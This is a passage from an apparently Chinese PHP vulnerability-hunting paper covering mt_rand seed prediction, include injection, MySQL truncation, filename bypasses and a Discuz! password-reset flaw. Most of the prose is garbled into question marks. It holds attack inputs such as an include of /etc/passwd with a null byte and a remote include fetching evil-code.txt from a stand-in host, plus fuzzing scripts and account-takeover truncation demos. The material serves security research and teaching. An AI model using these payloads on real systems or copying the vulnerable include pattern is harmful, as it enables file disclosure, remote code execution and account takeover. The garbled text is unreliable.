            	return false;
            }
            ?>
            -------------------------------------------------------------------------------
            
                ???н?????£?
            
            -------------------------------------------------------------------------------
            php5>php rand.php
            M8pzpjwCrvVt3oobAaOr
            0123456789101112131415161718192021222324252627282930313233343536373839404142434
            445464748495051525354555657585960616263646566676869
            7071727374757677787980818283848586878889909192939495969798991001011021031041051
            061071081091101111121131141151161171181191201211221
            2312412512612712812913013113213313413513613713813914014114214314414514614714814
            915015115215315415515615715815916016116216316416516
            6167168169170171172173174175176177178179180181182183184185186187188189190191192
            193194195196197198199200201202203204205206207208209
            2102112122132142152162172182192202212222232242252262272282292302312322332342352
            362372382392402412422432442452462472482492502512522
            ..............01062110622106231062410625106261062710628106291063010631106321063
            3o
            70693
            pjwCrvVt3oobAaOr
            -------------------------------------------------------------------------------
            
                ??10634?????????????????
            
                ??PHP?汾????5.2.1??????????????????????????????????????????????
            ??php5.2.0???????????????mt_rand()?????????????磺
            
            --code-------------------------------------------------------------------------
            <?php
            mt_srand(42);
            echo mt_rand();
            // Same fixed seed, different first output across versions (the Mersenne Twister
            // implementation changed in 5.2.1, see the excerpt above):
            //   php<=5.2.0 -> 1387371436
            //   php>5.2.0  -> 1354439493
            ?>
            -------------------------------------------------------------------------------
            
                ?????????????????????exp?????л??????????>5.20???????exp???е?????
            ???>5.20??汾????????????????
            
                ?????????????????????php<5.26????????ж??岥???mt_rand???????????????
            ??????web??????????mt_rand???????????session???????????????????????
            ????????????????????????????????
            
                ????????????????????????????wordpress??phpbb??punbb????????????????
            ???????1?????????bbs????Discuz!??mt_srand???μ??????
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾???php4 php5<5.2.6
            ???????
            ???????????mt_srand/mt_rand
            +++++++++++++++++++++++++
            
            
            5.6 ???????
            
                ????????????????????????????壬????????Щcode hacking????????????????
            ????????????????????????
               
            5.6.1 ???
            
                ???????????????????????null???????
            
            5.6.1.1 include???
            
            --code-------------------------------------------------------------------------
            <?php 
            // VULNERABLE: an unvalidated request parameter is spliced into the include path.
            // Path separators and traversal in "action" are honoured, and with allow_url_include
            // enabled a URL is accepted as well. Map "action" through an allowlist of known
            // names (or resolve it under a fixed directory and compare with realpath()) instead.
            include $_GET["action"].".php"; 
            ?>
            -------------------------------------------------------------------------------
            
                ????action=/etc/passwd%00???е??%00????????????.php????????????%00?????????
            ???????????????????????????????????????????url?????????????????????
            ??action=http://www.hacksite.com/evil-code.txt????????????????α?????????????????
            ???????????????????????д??????fuzz??£?
            
            --code-------------------------------------------------------------------------
            <?php
            ////////////////////
            ////var5.php????:
            ////include $_GET["action"].".php"; 
            ////print strlen(realpath("./"))+strlen($_GET["action"]);  
            ///////////////////
            // Probes the local test page (var5.php, see the header comment) for the path length
            // at which the appended ".php" stops mattering: each round appends one more "/" to
            // "1.txt" and re-requests until the marker printed by 1.txt comes back. The limit
            // is platform dependent (the text below cites 256 on Windows and 4096 on *nix);
            // an allowlisted include name removes the whole class of problem.
            ini_set("max_execution_time", 0);
            $str="";
            for($i=0;$i<50000;$i++)
            {
            	$str=$str."/";
            
            	$resp=file_get_contents("http://127.0.0.1/var/var5.php?action=1.txt".$str);
            	// 1.txt presumably contains: print "hi"; — the marker looked for below
            	if (strpos($resp, "hi") !== false){
            		print $i;
            		exit;
            	}
            }
            ?>
            -------------------------------------------------------------------------------
            
                ?????????????.?????? /??????2??????????????????????????????win????*nix
            ????????????????win??strlen(realpath("./"))+strlen($_GET["action"])????????
            256???????????*nix???????4 * 1024 = 4096??????php.ini???????????????????
            ???????????????????????????????????????cloie#ph4nt0m.org???????]??
            
            
            5.6.1.2 ??????
                
                ??????web???????????????????????????????????????????????
            ?ó????????????username????????????е?username??????????????????????
            ??????????????????????????????Щ?ж???????????????????????2????????
            ???
                
            1) Mysql SQL Column Truncation Vulnerabilities
               
                ????????????Stefan Esser??????Stefan Esser????????:)?????????????mysql
            ??sql_mode?????default?????????п???STRICT_ALL_TABLES??????MySQL???????
            ???????????warning????????error???????error????????????????????????Щ??
            ?????????????£?
                
            --code-------------------------------------------------------------------------
            mysql> insert into truncated_test(`username`,`password`) values("admin","pass");
            
            mysql> insert into truncated_test(`username`,`password`) values("admin           x", "new_pass");
            Query OK, 1 row affected, 1 warning (0.01 sec)
            
            mysql> select * from truncated_test;
            +----+------------+----------+
            | id | username   | password |
            +----+------------+----------+
            | 1 | admin      | pass     |
            | 2 | admin      | new_pass |
            +----+------------+----------+
            2 rows in set (0.00 sec)
            -------------------------------------------------------------------------------
            
            2) Mysql charset Truncation vulnerability
                
                ????????80sec????????mysql????????洢????utf8??????????Щ???????????
            ???????????£?
                
            --code-------------------------------------------------------------------------
            mysql> insert into truncated_test(`username`,`password`) values(concat("admin",0xc1), "new_pass2");
            Query OK, 1 row affected, 1 warning (0.00 sec)
            
            mysql> select * from truncated_test;
            +----+------------+----------+
            | id | username   | password |
            +----+------------+----------+
            | 1 | admin      | pass      |
            | 2 | admin      | new_pass  |
            | 3 | admin      | new_pass2 |
            +----+------------+----------+
            2 rows in set (0.00 sec)
            -------------------------------------------------------------------------------
                
                ????web??ó?????п??????Щ?????????????洢???????????????????
            ????????′???
            
            --code-------------------------------------------------------------------------
            $result = mysql_query("SELECT * from test_user where user="$user" ");
              ....
            if(@mysql_fetch_array($result, MYSQL_NUM)) {
            	die("already exist");
            }
            -------------------------------------------------------------------------------
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.6.1.3 ?????????????????
                
                ??????????к????????????????????????????web??ó?????????????Щ??
            ???????°????????????????????windows????????????????.????????????
            ???????????????????д?????????????дwebshell?????????windows?????.\..\??
            ?????????????
                
                ???滹?????????????????????????
            
            --code-------------------------------------------------------------------------
            //Is this code vul?
            if( eregi(".php",$url) ){
            	die("ERR");
            }
            $fileurl=str_replace($webdb[www_url],"",$url);
            .....
            header("Content-Disposition: attachment; filename=".$filename);
            -------------------------------------------------------------------------------
                
                ?????????????????????????????????????á?.php?????????????????????
            ??str_replace?滻$webdb[www_url]???????????????.p$webdb[www_url]hp??????????
            ????????????????fix???????????????′???
            
            --code-------------------------------------------------------------------------
            $fileurl=str_replace($webdb[www_url],"",$url);
            // NOTE(review): the check below still inspects $url rather than $fileurl, so the
            // replacement above has no effect on it — confirm which variable was intended.
            // Also, eregi() (removed in PHP 7) treats the "." in ".php" as "any character";
            // preg_match('/\.php/i', ...) is the modern form with the dot escaped.
            if( eregi(".php",$url) ){
            	die("ERR");
            }
            -------------------------------------------------------------------------------
            
                str_replace????????????????????str_replace???????????????????????
            ????????????????Щ??????????????????????????????????????
            
            --code-------------------------------------------------------------------------
            <?php
            // Probes which trailing byte the filesystem still resolves to 1.php: tries
            // "1.ph" . chr($i) for i in 0..254 (255 is never tried) and prints each byte that
            // yields a non-empty read; "@" hides the warnings from the misses. The text below
            // reports that on Windows several bytes besides "p"/"P" succeed, so an extension
            // check must be made on the canonical (resolved) filename, not on the raw string.
            for($i=0;$i<255;$i++) {
            	$url = "1.ph".chr($i);
            	$tmp = @file_get_contents($url);
            	if(!empty($tmp)) echo chr($i)."\r\n";
            }  
            ?>
            -------------------------------------------------------------------------------
            
                ??????windows???????????????????????* < > ? P p??????????μ?1.php??
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ?????????????????????
            +++++++++++++++++++++++++
            
            
            ????????????????μ????
            
                ?????????о??????????????????????????????????????????????????
            ??????μ??????????÷?????
            
                * ???????????????????????exp?????????????????
                
                * ?????php???????????,?????μ???Σ??????????????÷????
                
                * fuzz php???????????μ???????????????????????????????????μ?4.6?????
            ??????????fuzz???????????????
                
                * ????php??????????μ?????????????????????????????????????????Щ???????
            ?????????????php??????????????????????????μ??????????php?????????
            ??????3??????????????????????????μ????????????????????????????????????
            ????????Щ?????php???????????
                
                * ??????????????????????????????????Щ???ù???????????????????
            ???????
                
                * ?????????????? ????
              
            
            ???DEMO
            
                * DEMO -- Discuz! Reset User Password 0day Vulnerability ????
                ??Exp:http://www.80vul.com/dzvul/sodb/14/sodb-2008-14.txt??
            
                PHP?汾???:php4 php5<5.2.6
                ?????: ??
                ??????:????mt_srand/mt_rand
            
                ????? ???Discuz! 6.1??????grep????mt_srand?????
            
            -------------------------------------------------------------------------------
            heige@heige-desktop:~/dz6/upload$ grep -in "mt_srand" -r ./ --colour -5
            ./include/global.func.php-694-  $GLOBALS["rewritecompatible"] && $name = rawurlencode($name);
            ./include/global.func.php-695-  return "<a href="tag-".$name.".html"".stripslashes($extra).">";
            ./include/global.func.php-696-}
            ./include/global.func.php-697-
            ./include/global.func.php-698-function random($length, $numeric = 0) {
            ./include/global.func.php:699:  PHP_VERSION < "4.2.0" && mt_srand((double)microtime() * 1000000);
            ./include/global.func.php-700-  if($numeric) {
            ./include/global.func.php-701-          $hash = sprintf("%0".$length."d", mt_rand(0, pow(10, $length) - 1));
            ./include/global.func.php-702-  } else {
            ./include/global.func.php-703-          $hash = "";
            ./include/global.func.php-704-          $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
            --
            ./include/discuzcode.func.php-30-
            ./include/discuzcode.func.php-31-if(!isset($_DCACHE["bbcodes"]) || !is_array($_DCACHE["bbcodes"]) || !is_array($_DCACHE["smilies"])) {
            ./include/discuzcode.func.php-32-       @include DISCUZ_ROOT."./forumdata/cache/cache_bbcodes.php";
            ./include/discuzcode.func.php-33-}
            ./include/discuzcode.func.php-34-
            ./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
            ./include/discuzcode.func.php-36-
            ./include/discuzcode.func.php-37-function attachtag($pid, $aid, &$postlist) {
            ./include/discuzcode.func.php-38-       global $attachrefcheck, $thumbstatus, $extcredits, $creditstrans, $ftp, $exthtml;
            ./include/discuzcode.func.php-39-       $attach = $postlist[$pid]["attachments"][$aid];
            ./include/discuzcode.func.php-40-       if($attach["attachimg"]) {
            -------------------------------------------------------------------------------
            
                ??????????????mt_srand()????1????./include/global.func.php?????????random()??
            
            --code-------------------------------------------------------------------------
             PHP_VERSION < "4.2.0" && mt_srand((double)microtime() * 1000000);
            -------------------------------------------------------------------------------
            
                ?ж???汾???????PHP_VERSION > "4.2.0"???php???????????????????????
            ???????????ó????????php?????????????????????????
            
            1) "Cross Application Attacks" ????·???????????????????????????????
            mt_srand((double)microtime() * 1000000)?????????????п????????????dz??????
            ?Cross Application??????????????????????????????????2??????? 
            
            --code-------------------------------------------------------------------------
            ./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
            -------------------------------------------------------------------------------
            
                ??????????dz?????????????????????????exp????????????????????exp????
            ?????????????????????????]??
            
            2) ?е????????????mt_srand((double)microtime() * 1000000);???????壬???dz??
            ?????????????????????????????????????????????????ó?????ж??壬??β?
            ????"Cross Application Attacks"??5.2.6>php>4.2.0 php????????????????????
            ????????????????????п????????????????????????
            
            
            ?????
            
                ??????80vul??????????80vul-A??80vul-B??80vul-C?????????????????80vul-B??
            ????????·?????????????л????????????????Щ????????????????????????
            ??б???????????д???ο????????????????????????????????????????????????
            ??????????о?????????????????google???????????д????????????????????
            ???????ó????0day???????????????????????????????????????????????????
            ??????????????檔????????????????????????????Щ?????????????????????????
            ??????Щ??ó????0day??????????????????????????????лл??????
            
            
            ??????
            
            [1] http://bbs.phpchina.com/attachment.php?aid=22294
            [2] http://www.php-security.org/
            [3] http://bugs.php.net/bug.php?id=40114
            
            -EOF-
            